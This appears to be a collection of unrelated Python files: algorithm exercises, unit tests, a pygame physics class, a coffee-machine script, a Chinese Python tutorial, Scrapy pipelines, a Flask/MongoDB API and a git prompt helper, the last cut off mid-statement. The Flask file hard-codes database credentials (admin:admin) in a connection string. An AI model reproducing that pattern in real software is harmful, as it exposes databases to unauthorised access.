                print("Precision: %.2f" % precision)
                print("Recall: %.2f" % recall)
            print("F1: %.3f" % best_f_score)
        total_match_num += best_match_num
        total_test_num += test_triple_num
        total_gold_num += gold_triple_num
        sent_num += 1
    if verbose:
        print("Total match number, total triple number in AMR 1, and total triple number in AMR 2:", file=DEBUG_LOG)
        print(total_match_num, total_test_num, total_gold_num, file=DEBUG_LOG)
        print("---------------------------------------------------------------------------------", file=DEBUG_LOG)
    # output document-level smatch score (a single f-score for all AMR pairs in two files)
    if single_score:
        (precision, recall, best_f_score) = compute_f(total_match_num, total_test_num, total_gold_num)
        if pr_flag:
            print("Precision: %.3f" % precision)
            print("Recall: %.3f" % recall)
        print("Document F-score: %.3f" % best_f_score)
    arguments.f[0].close()
    arguments.f[1].close()
if __name__ == "__main__":
    # Parse command-line arguments and run the smatch computation.
    parser = build_arg_parser()
    args = parser.parse_args()
    main(args)
|
'''
238. Product of Array Except Self
Given an array nums of n integers where n > 1, return an array output such that output[i] is equal to the product of all the elements of nums except nums[i].
Example:
Input: [1,2,3,4]
Output: [24,12,8,6]
Constraint: It's guaranteed that the product of the elements of any prefix or suffix of the array (including the whole array) fits in a 32 bit integer.
Note: Please solve it without division and in O(n).
Follow up:
Could you solve it with constant space complexity? (The output array does not count as extra space for the purpose of space complexity analysis.)
'''
from typing import List
class Solution:
    """LeetCode 238 — Product of Array Except Self.

    Three implementations with the same contract: given `array`, return a
    list where position i holds the product of all elements except array[i],
    without using division.
    """

    # O(n^2) time, O(1) extra space.
    # FIX: the original comment claimed O(n), which was wrong — this makes
    # a full inner pass per element.
    def bruteForce(self, array):
        """For each index, multiply every other element directly."""
        products = [1 for _ in range(len(array))]
        for i in range(len(array)):
            product = 1
            for j in range(len(array)):
                if i != j:
                    product *= array[j]
            products[i] = product
        return products

    # O(n) time, O(n) extra space: explicit prefix and suffix product arrays.
    def threeLoops(self, array):
        """products[i] = (product of array[:i]) * (product of array[i+1:])."""
        products = [1 for _ in range(len(array))]
        leftProducts = [1 for _ in range(len(array))]
        rightProducts = [1 for _ in range(len(array))]
        lp = 1
        for i in range(len(array)):
            leftProducts[i] = lp
            lp *= array[i]
        rp = 1
        for i in reversed(range(len(array))):
            rightProducts[i] = rp
            rp *= array[i]
        for i in range(len(array)):
            products[i] = leftProducts[i] * rightProducts[i]
        return products

    # O(n) time, O(1) extra space beyond the output array: fold the prefix
    # pass into the result, then multiply in suffix products going backwards.
    def twoLoops(self, array):
        """Space-optimized variant of threeLoops."""
        products = [1 for _ in range(len(array))]
        lp = 1
        for i in range(len(array)):
            products[i] = lp
            lp *= array[i]
        rp = 1
        for i in reversed(range(len(array))):
            products[i] *= rp
            rp *= array[i]
        return products

    def productExceptSelf(self, nums: List[int]) -> List[int]:
        """Entry point matching the LeetCode signature."""
        return self.twoLoops(nums)
if __name__ == "__main__":
    # Smoke test using the example from the problem statement.
    solution = Solution()
    sample_input = [1,2,3,4]
    sample_output = [24,12,8,6]
    assert solution.productExceptSelf(sample_input) == sample_output
    print("Test passed")
|
import unittest
from katas.kyu_7.summing_a_numbers_digits import sumDigits
class SumDigitsTestCase(unittest.TestCase):
    """Tests for sumDigits: per these cases it sums the decimal digits of an
    integer, ignoring the sign (e.g. -32 -> 3 + 2 = 5)."""
    def test_equals(self):
        self.assertEqual(sumDigits(10), 1)
    def test_equals_2(self):
        self.assertEqual(sumDigits(99), 18)
    def test_equals_3(self):
        self.assertEqual(sumDigits(-32), 5)
|
import pygame
from random import randint
import math
class Particle(object):
    """A 2-D ball for a pygame particle simulation.

    Velocity is stored in polar form as (speed, angle).  Screen coordinates
    are used (y grows downward), so `gravity` points at angle pi/2 — "down"
    on screen.
    """
    # Class-wide physics settings shared by all particles.
    gravity_switch = True  # apply gravity in move() when True
    gravity = (math.pi / 2, 0.5)  # (angle, magnitude) added to velocity each step
    elastic = 0.8  # fraction of speed kept after a wall bounce
    def __init__(self, coordinate, radius, velocity, thickness=4):
        """Create a particle.

        coordinate -- (x, y) initial position
        radius     -- circle radius in pixels
        velocity   -- (speed, angle) polar velocity
        thickness  -- outline thickness passed to pygame.draw.circle
        """
        self.x, self.y = coordinate
        self.radius = radius
        self.mass_density = 100
        # Mass of a sphere: 4/3 * pi * r^3 * density.
        self.mass = 4 / 3 * math.pi * math.pow(self.radius, 3) * self.mass_density
        self.color = (randint(50, 255), randint(50, 255), randint(50, 255))
        self.oldColor = self.color
        self.thickness = thickness
        self.speed, self.angle = velocity
        self.drag = 0.9999
    def display(self, screen):
        """Draw the particle on *screen*."""
        pygame.draw.circle(screen, self.color, (int(self.x), int(self.y)), self.radius, self.thickness)
        # dx/dy feed only the commented-out velocity-vector debug line below.
        dx = math.cos(self.angle) * self.speed  # vx * t
        dy = math.sin(self.angle) * self.speed
        # pygame.draw.lines(screen, self.color, False, [(self.x, self.y), (self.x + pow(10, 3) * dx, self.y + pow(10, 3) * dy)], 2)
    def move(self, screen):
        """Advance the particle one time step: drag, gravity, then position."""
        # air friction
        self.speed *= self.drag
        if self.speed < 0.2 and screen.get_height() - (self.y + self.radius) < 0.4:
            # make the balls stop more naturally (nearly stopped and resting on floor)
            self.speed *= 0.05
            self.y = screen.get_height() - self.radius
        else:
            # gravity effect
            if Particle.gravity_switch:
                self.angle, self.speed = self.add_vector((self.angle, self.speed), Particle.gravity)
            # update position
            dx = math.cos(self.angle) * self.speed  # dx = vx * t
            dy = math.sin(self.angle) * self.speed  # dy = vy * t
            self.x += dx  # x = x0 + vx * t
            self.y += dy  # y = y0 + vy * t
    def drag_move_params_update(self, screen, mouse_pos):
        """Point the velocity from the particle toward the mouse cursor.

        Speed is half the distance to the cursor; dragging past the right
        edge pins the particle at the edge and stops it.  NOTE(review): only
        the right boundary is clamped here — confirm whether that is intended.
        """
        mouseX, mouseY = mouse_pos
        if mouseX > screen.get_width():
            self.x = screen.get_width() - self.radius
            self.speed = 0
        else:
            dx = mouseX - self.x
            dy = mouseY - self.y
            self.speed = math.hypot(dx, dy) * 0.5
            self.angle = math.atan2(dy, dx)
    def wall_bounce(self, screen):
        """Reflect the particle off the four screen edges with energy loss."""
        width = screen.get_width()
        height = screen.get_height()
        # right boundary check
        d1 = self.x - (width - self.radius)
        if d1 >= 0:  # the ball has crossed the right wall a distance d1
            self.x = (width - self.radius) - d1  # reflect x
            self.angle = math.pi - self.angle  # reflect the angle
            self.speed *= Particle.elastic  # elastic lost
        # left boundary check
        d2 = self.radius - self.x
        if d2 >= 0:  # the ball has crossed the left wall a distance d2
            self.x = d2 + self.radius  # reflect x
            self.angle = math.pi - self.angle  # reflect the angle
            self.speed *= Particle.elastic  # elastic lost
        # top boundary check
        a1 = self.radius - self.y
        if a1 >= 0:  # the ball has crossed the ceiling a distance a1
            self.y = a1 + self.radius
            self.angle = - self.angle
            self.speed *= Particle.elastic
        # bottom boundary check
        a2 = self.y + self.radius - height
        if a2 >= 0:  # the ball has sink down below the floor a distance a2
            self.y = height - self.radius - a2
            self.angle = - self.angle
            self.speed *= Particle.elastic
    def add_vector(self, vector1, vector2):
        """Add two polar (angle, magnitude) vectors; return (angle, magnitude)."""
        a1 = vector1[0]
        sp1 = vector1[1]
        # Convert both vectors to Cartesian components.
        x1 = sp1 * math.cos(a1)
        y1 = sp1 * math.sin(a1)
        a2 = vector2[0]
        sp2 = vector2[1]
        x2 = sp2 * math.cos(a2)
        y2 = sp2 * math.sin(a2)
        sum_x = x1 + x2
        sum_y = y1 + y2
        sum_angle = math.atan2(sum_y , sum_x)
        # sum_mag = math.sqrt(math.pow(sum_x, 2) + math.pow(sum_y, 2))
        sum_mag = math.hypot(sum_x, sum_y)
        return sum_angle, sum_mag
|
from .info import get_alliance_info as get_info
|
# vim:fenc=utf-8 ff=unix ft=python ts=4 sw=4 sts=4 si et
import unittest
from bleach_allowlist.bleach_allowlist import (
markdown_tags as allowlist_markdown_tags,
markdown_attrs as allowlist_markdown_attrs
)
from mkdocssafetext.config import SafeTextPluginConfig
class TestSafeTextPlugin(unittest.TestCase):
    """Tests for SafeTextPluginConfig's tag/attribute allowlist handling."""
    def setUp(self):
        pass
    def test_default_config_is_based_on_allowlist(self):
        """Empty config falls back to bleach_allowlist's markdown defaults."""
        config_is_nothing = {
            'append_allowed_tags': [],
            'remove_allowed_tags': [],
            'allowed_attrs': {},
        }
        plugin_config = SafeTextPluginConfig(config_is_nothing)
        self.assertEqual(plugin_config.markdown_tags,
                         allowlist_markdown_tags)
        self.assertEqual(plugin_config.markdown_attrs,
                         allowlist_markdown_attrs)
    def test_append_allowed_tags(self):
        """append_allowed_tags adds tags on top of the default allowlist."""
        config_append_allowed_tags = {
            'append_allowed_tags': ['video', 'audio'],
            'remove_allowed_tags': [],
            'allowed_attrs': {},
        }
        plugin_config = SafeTextPluginConfig(config_append_allowed_tags)
        self.assertIn('video', plugin_config.markdown_tags)
        self.assertIn('audio', plugin_config.markdown_tags)
        self.assertNotIn('undefined', plugin_config.markdown_tags)
        self.assertNotEqual(plugin_config.markdown_tags,
                            allowlist_markdown_tags)
    def test_remove_allowed_tags(self):
        """remove_allowed_tags strips tags from the default allowlist."""
        config_remove_allowed_tags = {
            'append_allowed_tags': [],
            'remove_allowed_tags': ['ul', 'ol', 'li'],
            'allowed_attrs': {},
        }
        plugin_config = SafeTextPluginConfig(config_remove_allowed_tags)
        self.assertNotIn('ul', plugin_config.markdown_tags)
        self.assertNotIn('ol', plugin_config.markdown_tags)
        self.assertNotIn('li', plugin_config.markdown_tags)
        self.assertIn('h1', plugin_config.markdown_tags)
        self.assertNotEqual(plugin_config.markdown_tags,
                            allowlist_markdown_tags)
    def test_allowed_attrs(self):
        """A non-empty allowed_attrs replaces the default attribute allowlist."""
        config_allowed_attrs = {
            'append_allowed_tags': [],
            'remove_allowed_tags': [],
            'allowed_attrs': {"img": ["src", "width", "height"]},
        }
        plugin_config = SafeTextPluginConfig(config_allowed_attrs)
        self.assertEqual(plugin_config.markdown_attrs,
                         config_allowed_attrs['allowed_attrs'])
        self.assertNotEqual(plugin_config.markdown_attrs,
                            allowlist_markdown_attrs)
    def test_str(self):
        """str() of the config mentions both the tags and attrs sections."""
        config_is_nothing = {
            'append_allowed_tags': [],
            'remove_allowed_tags': [],
            'allowed_attrs': {},
        }
        plugin_config = SafeTextPluginConfig(config_is_nothing)
        printable_plugin = str(plugin_config)
        self.assertIn('tags:', printable_plugin)
        self.assertIn('attrs: ', printable_plugin)
    def tearDown(self):
        pass
|
# Drink recipes: ingredient amounts (water/milk in ml, coffee in grams)
# and price in dollars.
MENU = {
    "espresso": {
        "ingredients": {
            "water": 50,
            "coffee": 18,
        },
        "cost": 1.5,
    },
    "latte": {
        "ingredients": {
            "water": 200,
            "milk": 150,
            "coffee": 24,
        },
        "cost": 2.5,
    },
    "cappuccino": {
        "ingredients": {
            "water": 250,
            "milk": 100,
            "coffee": 24,
        },
        "cost": 3.0,
    }
}
# Current machine stock plus money collected so far.
resources = {
    "water": 300,
    "milk": 200,
    "coffee": 100,
    "money": 0,
}
# Machine power state; the main loop runs while this is 'on'.
STATE = 'on'
def print_report():
    """Print the machine's current stock levels and collected money."""
    report_lines = (
        f"Water: {resources['water']}ml.",
        f"Milk: {resources['milk']}ml.",
        f"Coffee: {resources['coffee']}gram.",
        f"Money: ${resources['money']}",
    )
    for report_line in report_lines:
        print(report_line)
def check_resources(coffee):
    """Return True when the machine has enough ingredients for *coffee*.

    Prints "Sorry there is not enough <item>." for the first missing
    ingredient and returns False otherwise.

    BUG FIX: the original left `enough_milk` undefined on the espresso path,
    so an espresso order with enough water but not enough coffee raised
    NameError.  Ingredients are now checked one by one (water, coffee, milk)
    and only those present in the drink's recipe are considered.

    NOTE(review): the original used strict `>` comparisons, so an exactly
    sufficient stock is still rejected; that behavior is preserved here —
    confirm whether `>=` was intended.
    """
    ingredients = MENU[coffee]['ingredients']
    # Same report order as the original elif chain: water, coffee, milk.
    for item in ('water', 'coffee', 'milk'):
        needed = ingredients.get(item)
        if needed is None:
            continue  # this drink does not use the ingredient (e.g. espresso/milk)
        if not resources[item] > needed:
            print(f"Sorry there is not enough {item}.")
            return False
    return True
def process_coins(coffee):
    """Prompt for coins and check payment for the chosen drink.

    Returns True when the inserted money covers the drink's cost (printing
    the change when overpaid), False when the payment is insufficient.

    BUG FIX: the original's `elif change > 0` meant an EXACT payment
    (change == 0) fell through and returned None (falsy), so the customer
    paid but got no coffee; exact payment now succeeds.
    """
    print('Please insert coins.')
    quarters = int(input("How many quarters?: "))
    dimes = int(input("How many dimes?: "))
    nickles = int(input("How many nickles?: "))
    pennies = int(input("How many pennies?: "))
    money_received = pennies * 0.01 + nickles * 0.05 + dimes * 0.1 + quarters * 0.25
    cost_of_coffee = MENU[coffee]['cost']
    change = money_received - cost_of_coffee
    if money_received < cost_of_coffee:
        print("Sorry that's not enough money. Money refunded")
        return False
    if change > 0:
        print(f'Here is ${change} in change.')
    return True
def make_coffee(coffee):
    """Deduct the drink's ingredients from stock and bank its price.

    Milk is deducted only for non-espresso drinks (espresso's recipe has
    no milk entry).
    """
    recipe = MENU[coffee]['ingredients']
    resources["water"] -= recipe['water']
    resources["coffee"] -= recipe['coffee']
    if coffee != 'espresso':
        resources["milk"] -= recipe['milk']
    resources['money'] += MENU[coffee]['cost']
# Main service loop.
# BUG FIXES: the original assigned lowercase `state` on 'off', so the loop
# never terminated; it also compared the builtin `input` function (instead of
# `customer_input`) against 'latte'/'cappuccino', so only 'espresso' ever
# matched.  Both are corrected below.
while STATE == 'on':
    customer_input = input("What would you like? (espresso/latte/cappuccino):")
    if customer_input == 'report':
        print_report()
    elif customer_input == 'off':
        STATE = 'off'
    elif customer_input in ('espresso', 'latte', 'cappuccino'):
        if check_resources(customer_input):
            if process_coins(customer_input):
                make_coffee(customer_input)
                print(f'Here is your {customer_input} Enjoy!')
|
# 用戶定义类,数字常量和内置数学工具和扩展,表达式操作符递归阶乘
__author__ = 'bilaisheng'
'''
1.类的定义
2.父类,子类定义,以及子类调用父类
3.类的组合使用
4.内置功能
'''
# 类的定义
# class Hotel(object):
# # 构造函数
# def __init__(self, room, cf=1.0, br=15):
# self.room = room;
# self.cf = cf;
# self.br = br;
#
# def calc_all(self, days=1):
# return (self.room * self.cf + self.br) * days
#
# if __name__ == '__main__':
# stdroom = Hotel(200)
# big_room = Hotel(230, 0.9)
# print(stdroom.calc_all())
# print(stdroom.calc_all(2))
# print(big_room.calc_all())
# print(big_room.calc_all(2))
# 父类 子类以及调用父类
# 父类
class AddBook(object):
    """Address-book entry holding a contact's name and phone number."""

    def __init__(self, name, phone):
        """Store the contact's name and phone number as-is."""
        self.name = name
        self.phone = phone

    def get_phone(self):
        """Return the stored phone number."""
        return self.phone
# 子类继承
# class EmplEmail(AddBook):
#
# def __int__(self,nm, ph, email):
# # AddBook.__init__(selef, nm, ph) # 调用父类方法一
# super(EmplEmail, self).__init__(nm, ph)
# self.email = email
#
# def get_email(self):
# return self.email
#
# # 调用
# if __name__ == '__main__':
#
# detian = AddBook('Detian', '12345678901')
# meng = AddBook('Meng', '12345678902')
# print(detian.get_phone())
# print(AddBook.get_phone(meng))
#
# alice = EmplEmail('godliness', '1234567890', 'godliness@qq.com')
#
# print(alice.get_email(), alice.get_phone())
# 类的组合使用
'''
1.class类的组合使用
2.手机、邮箱、QQ等是可以变化的(定义在一起),姓名不可变(单独定义)。
3.在另一个类中引用
'''
# class Info(object):
# def __init__(self, phone, email, qq):
# self.phone = phone
# self.email = email
# self.qq = qq
#
# def get_phone(self):
# return self.phone
#
# def update_phone(self, newphone):
# self.phone = newphone
# print("手机号更改已更改")
#
# def get_email(self):
# return self.email
#
#
# class AddrBook(object):
# def __init__(self, name, phone, email, qq):
# self.name = name
# self.info = Info(phone, email, qq)
#
#
# if __name__ == "__main__":
# Detian = AddrBook('godliness', '1234567890', '1234567890@qq.com', '123456')
# print(Detian.info.get_phone())
# Detian.info.update_phone(738423647)
# print(Detian.info.get_phone())
# print(Detian.info.get_email())
'''
** x**y x的y次方
// x // y 两数相除向下取整
'''
x = 5
y = 3
a = 4
b = 2
print(x + y)  # 8 (FIX: the original comment wrongly said 7)
print(x - y)  # 2
print(x * y)  # 15
print(x / y)  # 1.6666666666666667 — float results may differ across machines
print(x // y)  # floor division: 1
print(x % y)  # remainder: 2
print(x ** y)  # 5 to the 3rd power: 125
print(a / b)  # true division always yields a float: 2.0
print(a % b)  # remainder: 0
print(a // b)  # floor division: 2
'''
关系运算符是对两个对象进行比较。
运算符 表达式 说明
== a==b 等于,比较对象是否相等
!= a != b 不等于,比较两个对象是否不相等(Python 2 中还可写作 <>,该写法在 Python 3 中已被移除)
'''
a = 4
b = 2
c = 2
print(a == b)  # False
print(a != b)  # True
print(a > b)  # True
print(a < b)  # False
print(a >= b)  # True
print(c <= b)  # True
a = 4
b = 2
c = 0
print(a > b and b > c)  # a>b is True, so b>c is evaluated; both True -> True
print(a > b and b < c)  # a>b is True, so b<c is evaluated; it is False -> False
print(a > b or c < b)  # a>b is True, so c<b is short-circuited -> True
print(not c < b)  # c<b is True, not True -> False
print(not a < b)  # a<b is False, not False -> True
a = 4
c = 0
# NOTE: `list` here shadows the builtin list type (kept as in the original).
list = [1, 2, 3, 4, 5]
if (a in list):
    print("%d is in list:%r" % (a, list))
if (c not in list):
    print("%d is not in list: %r" % (c, list))
# Python数学函数:
'''
需要导入math 模块包
函数 返回值 ( 描述 )
abs(x) 返回数字的绝对值,如abs(-10) 返回 10
ceil(x) 返回数字的上入整数,如math.ceil(4.1) 返回 5
cmp(x, y) 如果 x < y 返回 -1, 如果 x == y 返回 0, 如果 x > y 返回 1
exp(x) 返回e的x次幂(ex),如math.exp(1) 返回2.718281828459045
fabs(x) 返回数字的绝对值,如math.fabs(-10) 返回10.0
floor(x) 返回数字的下舍整数,如math.floor(4.9)返回 4
log(x) 如math.log(math.e)返回1.0,math.log(100,10)返回2.0
log10(x) 返回以10为基数的x的对数,如math.log10(100)返回 2.0
max(x1, x2,...) 返回给定参数的最大值,参数可以为序列。
min(x1, x2,...) 返回给定参数的最小值,参数可以为序列。
modf(x) 返回x的整数部分与小数部分,两部分的数值符号与x相同,整数部分以浮点型表示。
pow(x, y) x**y 运算后的值。
round(x [,n]) 返回浮点数x的四舍五入值,如给出n值,则代表舍入到小数点后的位数。
sqrt(x) 返回数字x的平方根,如math.sqrt(4)返回 2.0;参数为负数时抛出 ValueError(需要复数结果请使用 cmath.sqrt)
可以直接访问的数学函数:
abs(x) 返回数字的绝对值,如abs(-10) 返回 10
cmp(x, y) 如果 x < y 返回 -1, 如果 x == y 返回 0, 如果 x > y 返回 1
max(x1, x2,...) 返回给定参数的最大值,参数可以为序列。
min(x1, x2,...) 返回给定参数的最小值,参数可以为序列。
round(x [,n]) 返回浮点数x的四舍五入值,如给出n值,则代表舍入到小数点后的位数。
Python随机数函数:
python的随机数函数是不能直接访问的,需要导入 random 模块,然后通过 random 静态对象调用该方法。
函数 描述
choice(seq) 从序列的元素中随机挑选一个元素,比如random.choice(range(10)),从0到9中随机挑选一个整数。
randrange ([start,] stop [,step]) 从指定范围内,按指定基数递增的集合中获取一个随机数,基数缺省值为1
random() 随机生成下一个实数,它在[0,1)范围内。
seed([x]) 改变随机数生成器的种子seed。
shuffle(lst) 将序列的所有元素随机排序
uniform(x, y) 随机生成下一个实数,它在[x,y]范围内。
'''
import random
print("choice([1, 2, 3, 5, 9]) : ", random.choice([1, 2, 3, 5, 9]))
# Print an even number in the range 100 <= number < 1000.
print("randrange(100, 1000, 2) : ", random.randrange(100, 1000, 2))
# Generate a first random float in [0, 1).
print("random() : ", random.random())
# Re-seed so the next random() call is reproducible.
random.seed(10)
print("Random number with seed 10 : ", random.random())
list = [20, 16, 10, 5];
random.shuffle(list)
print("随机排序列表 : ", list)
print("uniform(5, 10) 的随机数为 : ", random.uniform(5, 10))
'''
Python三角函数:
Python三角函数是不能直接访问的,需要导入 math 模块,然后通过 math 静态对象调用该方法。
函数 描述
acos(x) 返回x的反余弦弧度值。
asin(x) 返回x的反正弦弧度值。
atan(x) 返回x的反正切弧度值。
atan2(y, x) 返回给定的 X 及 Y 坐标值的反正切值。
cos(x) 返回x的弧度的余弦值。
hypot(x, y) 返回欧几里德范数 sqrt(x*x + y*y)。
sin(x) 返回的x弧度的正弦值。
tan(x) 返回x弧度的正切值。
degrees(x) 将弧度转换为角度,如degrees(math.pi/2) , 返回90.0
radians(x) 将角度转换为弧度
'''
import math
# Angle conversions and trigonometric functions (arguments are radians).
print("degrees(3) : ", math.degrees(3))
print("radians(-3) : ", math.radians(-3))
print("sin(3) : ", math.sin(3))
print("cos(3) : ", math.cos(3))
print("tan(3) : ", math.tan(3))
print("acos(0.64) : ", math.acos(0.64))
print("asin(0.64) : ", math.asin(0.64))
print("atan(0.64) : ", math.atan(0.64))
print("atan2(-0.50,-0.50) : ", math.atan2(-0.50,-0.50))
print("hypot(0, 2) : ", math.hypot(0, 2))
'''
Python数学常量:
常量 描述
pi 数学常量 pi(圆周率,一般以π来表示)
e 数学常量 e,e即自然常数(自然常数)。
'''
print(math.pi)
print(math.e)
|
#!/usr/bin/env python
"""
Find the minimum element in a
Python List using recursion.
"""
def min_element(arr, last):
    """Recursively return the minimum of the elements of *arr* and *last*.

    *last* carries the smallest value seen so far; callers seed it with a
    known upper bound (or the list's last/first element).

    BUG FIX: the original returned `last` unconditionally when
    len(arr) == 1, so the final element was never compared
    (min_element([1, 0], 66) wrongly returned 1).  An empty list now
    simply returns `last` instead of raising IndexError.
    """
    if not arr:
        return last
    # Fold the head element into the running minimum, then recurse on the tail.
    new_min = arr[0] if arr[0] < last else last
    return min_element(arr[1:], new_min)

print(min_element([-20, 2, 3, 4, 5, 6, -1, 66], 66))
|
import os
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
# app = dash.Dash(
# __name__,
# external_stylesheets=[dbc.themes.BOOTSTRAP],
# meta_tags=[
# {'name': 'viewport',
# 'content': 'width=device-width, initial-scale=1.0'}
# ]
# )
# Page content for this route; `layout` is picked up by the Dash app
# (the app itself is constructed elsewhere — see the commented block above).
layout = html.Div([
    "Home Page change"
])
# if __name__ == '__main__':
# app.run_server(debug = False)
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import json
from twisted.enterprise import adbapi
from scrapy import log
import MySQLdb
import MySQLdb.cursors
class DoubanPipeline(object):
    """Scrapy pipeline appending each scraped book item to ./books.json,
    one JSON object per line.

    NOTE(review): this is Python 2-era code — the file is opened in binary
    mode ("wb") while json.dumps returns text, and fields are encoded to
    UTF-8 bytes before json.dumps; both would fail under Python 3.  Confirm
    the target runtime before reuse.
    """
    def __init__(self):
        # Output file is truncated every time the spider starts.
        self.file = open("./books.json", "wb")
    def process_item(self, item, spider):
        # Encoding conversion: turn every field into a UTF-8 byte string.
        for k in item:
            item[k] = item[k].encode("utf8")
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item
class MySQLPipeline(object):
    """Scrapy pipeline inserting book items into MySQL asynchronously via
    Twisted's adbapi connection pool."""
    def __init__(self):
        # Placeholder connection settings — replace db/user/passwd before use.
        self.dbpool = adbapi.ConnectionPool("MySQLdb",
            db = "dbname", # database name
            user = "username", # database user
            passwd = "password", # password
            cursorclass = MySQLdb.cursors.DictCursor,
            charset = "utf8",
            use_unicode = False
        )
    def process_item(self, item, spider):
        # Schedule the insert on the pool and attach error logging.
        query = self.dbpool.runInteraction(self._conditional_insert, item)
        query.addErrback(self.handle_error)
        return item
    def _conditional_insert(self, tb, item):
        # Runs in a pool thread; *tb* is the transaction/cursor object.
        tb.execute("insert into tabelname (name, author, press, date, page, price, score, ISBN, author_profile,\
            content_description, link) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",\
            (item["name"], item["author"], item["press"], item["date"],\
            item["page"], item["price"], item["score"], item["ISBN"],\
            item["author_profile"], item["content_description"], item["link"]))
        log.msg("Item data in db: %s" % item, level=log.DEBUG)
    def handle_error(self, e):
        # Log any failure raised by the asynchronous insert.
        log.err(e)
|
from flask import Flask
from flask import jsonify
from flask import request
from flask_pymongo import PyMongo
import config
import json
from bson import ObjectId
app = Flask(__name__)
# NOTE(review): Flask-PyMongo reads MONGO_URI (the database name comes from
# the URI path); the "MONGODB_DB" key looks unused by PyMongo — confirm.
# SECURITY: credentials are hard-coded in the connection string; move them
# into configuration or the environment.
app.config["MONGODB_DB"] = "myFirstDatabase"
app.config['MONGO_URI'] = 'mongodb+srv://admin:admin@cluster0.og2k6.mongodb.net/myFirstDatabase?retryWrites=true&w=majority'
mongo = PyMongo(app)
@app.route('/getEliteUsers/<string:year>', methods=['GET'])
def get_elite_users(year):
    """Return all documents whose `elite` field mentions *year*.

    NOTE(review): the result is a JSON *string* nested inside the jsonify
    payload (double-encoded) — existing clients may rely on this shape.
    """
    cursor = mongo.db.myData.aggregate([
        {"$match": {"elite": {"$regex": year}}},
    ])
    payload = json.dumps(list(cursor), default=str)
    return jsonify({'result': payload})
# @app.route('/deleteUsers/<int:number>', methods = ["DELETE"])
# def delete_users(number):
# ndoc = mongo.db.myData.find({}, ('_id',), limit=number)
# selector = {'_id': {'$in': [doc['_id'] for doc in ndoc]}}
# result = mongo.db.myData.delete_many(selector)
# print("The ackowledgement value is {0} and the deleted count {1}".format(result.acknowledged, result.deleted_count))
# return jsonify({'result': result.acknowledged})
# @app.route('/updateRecordForID/<string:id>', methods = ["PUT"])
# def update_record(id):
# data = mongo.db.myData.find({"_id":id})
@app.route('/getDonald', methods=['GET'])
def getDonald():
    """Fetch every document whose name is 'Donald' as a JSON string payload."""
    matches = mongo.db.myData.find({"name": "Donald"})
    serialized = json.dumps(list(matches), default=str)
    return jsonify({'result': serialized})
@app.route('/editReviewCount/<int:adder>', methods=['PUT'])
def editReviewCount(adder):
    """Increment review_count by `adder` for every user named 'Donald'."""
    donalds = mongo.db.myData.find({"name": "Donald"})
    for doc in donalds:
        new_count = doc['review_count'] + adder
        # Third positional argument is upsert=True (kept from the original).
        mongo.db.myData.update_one(
            {"_id": doc["_id"]},
            {"$set": {'review_count': new_count}},
            True)
    return jsonify({'result': True})
if __name__ == '__main__':
    # Debug mode enables the reloader and in-browser tracebacks — development only.
    app.run(debug=True)
|
import httplib2
from apiclient import errors, discovery
from oauth2client import client
from apiclient.http import BatchHttpRequest
class GmailService(object):
    """Thin wrapper around the Gmail v1 API, built from stored OAuth2 credentials."""
    def __init__(self, credentialsJson):
        # Rehydrate OAuth2 credentials from their JSON serialization.
        credentials = client.OAuth2Credentials.from_json(credentialsJson)
        # Attach the credentials so every request carries authorization.
        http_auth = credentials.authorize(httplib2.Http())
        self.gmailService = discovery.build('gmail', 'v1', http=http_auth)
    def getCurrentUser(self):
        """Return the Gmail profile of the authenticated user ('me')."""
        return self.gmailService.users().getProfile(userId='me').execute()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_project-skeleton
----------------------------------
Tests for `project-skeleton` module.
"""
import unittest
# Bug fix: the generated names contained hyphens ("project-skeleton",
# "TestProject-skeleton"), which are not valid Python identifiers and made
# this file a SyntaxError. Underscore/CamelCase equivalents are used instead.
from project_skeleton import project_skeleton


class TestProjectSkeleton(unittest.TestCase):
    """Skeleton test case for the project_skeleton module."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_000_something(self):
        pass


if __name__ == '__main__':
    import sys
    sys.exit(unittest.main())
|
# -*- coding: utf-8 -*-
import os
import subprocess
from pieprompt.parts import Part
from pieprompt.util import Color
from pieprompt.util import colorize
from pieprompt.util import run_command
def get_git_part():
    """Build the git segment of the prompt, or return None when it should be hidden."""
    # TODO: Move this checking logic elsewhere
    # PIEPROMPT_NO_GIT is a comma-separated list of directories in which git
    # info must not be shown.
    no_git = os.environ.get('PIEPROMPT_NO_GIT', '')
    no_git_folders = [
        os.path.normpath(os.path.expanduser(path))
        for path in no_git.split(',')
    ]
    cwd = os.getcwd()
    if any([
        cwd.startswith(folder)
        for folder in no_git_folders
    ]):
        return None
    try:
        git_dir = run_command(('git', 'rev-parse', '--git-dir'))
    except subprocess.CalledProcessError:
        # Not inside a git work tree.
        return None
    if not os.path.isdir(git_dir):
        return None
    branch_name = run_command(('git', 'symbolic-ref', '--short', '-q', 'HEAD'))
    # Detect in-progress operations by probing marker files under $GIT_DIR,
    # the same way git's own shell prompt does.
    branch_info = ''
    if os.path.isdir(os.path.join(git_dir, '..', '.dotest')):
        branch_info = '|AM/REBASE'
    elif os.path.isfile(os.path.join(git_dir, '.dotest-merge', 'interactive')):
        branch_info = '|REBASE-i'
    elif os.path.isdir(os.path.join(git_dir, '.dotest-merge')):
        branch_info = '|REBASE-m'
    elif os.path.isfile(os.path.join(git_dir, 'MERGE_HEAD')):
        branch_info = '|MERGING'
    elif os.path.isfile(os.path.join(git_dir, 'BISECT_LOG')):
        branch_info = '|BISECTING'
    # NOTE(review): branch_info is computed but never added to `bits`, so the
    # rebase/merge/bisect state is never displayed — looks like it was meant
    # to be appended to branch_name; confirm intent before changing output.
    git_status = run_command(('git', 'status'))
    is_clean = 'nothing to commit, working' in git_status.split('\n')[-1]
    bits = ['git:(', branch_name, ')']
    if not is_clean:
        bits.extend([' ', '✗'])
    colored_output = ''.join((
        colorize(Color.BLUE, bits[0]),
        colorize(Color.RED, bits[1]),
        colorize(Color.BLUE, bits[2]),
    ))
    if len(bits) > 3:
        # Dirty tree: append the uncolored space and the highlighted ✗ marker.
        colored_output += bits[3]
        colored_output += colorize(Color.UHOH, bits[4])
    return Part(
        colored_output=colored_output,
